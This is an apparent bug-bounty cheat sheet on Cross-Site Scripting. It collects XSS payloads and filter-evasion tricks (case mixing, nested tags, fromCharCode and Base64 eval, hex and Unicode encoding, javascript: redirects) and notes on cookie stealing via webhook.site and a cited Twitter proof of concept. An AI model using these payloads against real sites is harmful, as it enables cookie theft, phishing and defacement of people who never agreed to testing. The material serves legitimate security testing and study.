Cross-Site-Scripting (XSS)
References
ASCII Table: http://www.asciitable.com/
XSSStrike
OWASP Xenotix
XSSSniper
KeyLogger : https://github.com/chentetran/xss-keylogger
Tips
Identify more injection points[eg: Drop down menus]
Hidden fields-> Exploit using inspect element.
ASCII char escaping
Bypass char limit :Inspect element - > Tamper
maxlen
When
< > &
are escaped but"
and;
are allowed123"onmouseover="alert(document.domain)"
Here 123 is the field's value, onmouseover is the field attribute]
When developers forget to add
" "
for the value. We can append our payload as an additional attribute with the input valuetest" onmouseover=alert(document.domain)
onerror="alert('XSS')"
Comment out the rest:
<payload> //
This works because it's not a requirement to put quotes around an attribute value in HTML.
Clickable links that execute javascript but don't leave the page.
javascript:alert(document.domain);
<a href='javascript:alert(1)'
Escape blacklisted keywords[eg:domain,script,alert]
sCripT>alert(1)</sCripT>
<scr<script>ipt>alert(1)</scri</script>pt>
<script<script >alert(1)</script</script> >
<script>prompt("XSS")</script>
<a onmouseover="alert(1)">TEST</a>
<a onmouseout=alert(1)>TEST</a>
<a onmousemove=alert(1)>TEST</a>
<a onmouseclick=alert(1)>TEST</a>
<img src='zzzz' onerror=alert(1)></img>
<div> onmouseover=alert(1)></div>
<script>eval("al"%2b"ert(1)")</script>
Using String.fromCharCode()
Eg: String.fromCharCode(64) is
@
Converting
alert(1)
from the ASCII to decimal would result as:String.fromCharCode(97,108,101,114,116,40,49,41)
Final payload:
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
If "<> are not escaped:
eval();
To execute a string as Javascriptatob('')
Function to decode Base64 strings
Payload:
">eval(atob('base64_encoded_payload'));
eval(atob('PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='));
Base64 encoded payload in an i-frame
Payload:parent.alert(document.domain);
When
<>"
are escaped:Check if Hex Encoding works in the response [ Tip: If
\
is escaped, try\\
]0
:\x
>
:\x3e
<
:\x3c
\x3cscript\x3ealert(document.domain);\x3c/script\x3e
Unicode encoding
>
: \u003e<
: \u003c
When <script> tags are not allowed:
Load from external sources: https://pastebin.com/raw/rTRPYeNk
When case-sensitive: hTtPs
When singe quotes
'
are not filtered but<>
are filtered, use comments: [In source-code, this should e within <scriptabc";alert("XSS");\\
abc';alert('XSS');\\
<script>
name=hacker'; JaVaScRiPt:alert('XSS')// </script>
Inject on URL:
https://url.com/"><script>alert(1)</script>
https://url.com/file.php#<script>alert("XSs")</script>
<url>/"><script>alert(1)</script>
https://brutelogic.com.br/blog/xss-limited-input-formats/
Reference:https://hackerone.com/reports/260744
https://dev.twitter.com//x:1/:///%01javascript:alert(document.cookie)/
https://medium.com/r/?url=javascript:alert(document.cookie) PoC: XSS https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/javascript:alert(1)/HTTP Response: HTTP/1.1 302 Found location: javascript:alert(1) ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <title>Redirecting...</title> <h1>Redirecting...</h1> <p>You should be redirected automatically to target URL: <a href="javascript:alert(1)">javascript:alert(1)</a>. If not click the link.PoC: ClickJacking <iframe src="https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/http://www.bywalks.com/" sandbox="allow-forms"></iframe>
Payload to bypass simple email validation in PHP "><svg/onload=confirm(1)>"@x.y
A href
Because in JavaScript pseudo-protocol we use JS code right after the “:”, double slashes makes the payload an useless one because they turn the entire line into a comment. As a workaround we use a new line character (%0A) but double encoded since it needs to end up in the browser redirect and a single encoded new line just reflects in page’s source code.
javascript://%250Aalert(1)
Payloads
Reflected XSS
XSS Phishing
Deface Website
Cookie Stealing
https://webhook.site : Can be used as server to grab cookies.
DOM XSS
A website is made up of a DOM[Document Object Model], which describes the properties of a website such as URL, history, paths etc.
An attacker can manipulate the values of these properties to execute malicious JS. When an attacker manipulates the property, the input is passed from the DOM property to a function that can execute JS. This does not need to be displayed on the page persay. Unlike Reflected/Stored XSS.
eg eval: Code injection does not show on the page.
Sources take DOM input, Sinks does not.
Learn from www.domxss.com
Last updated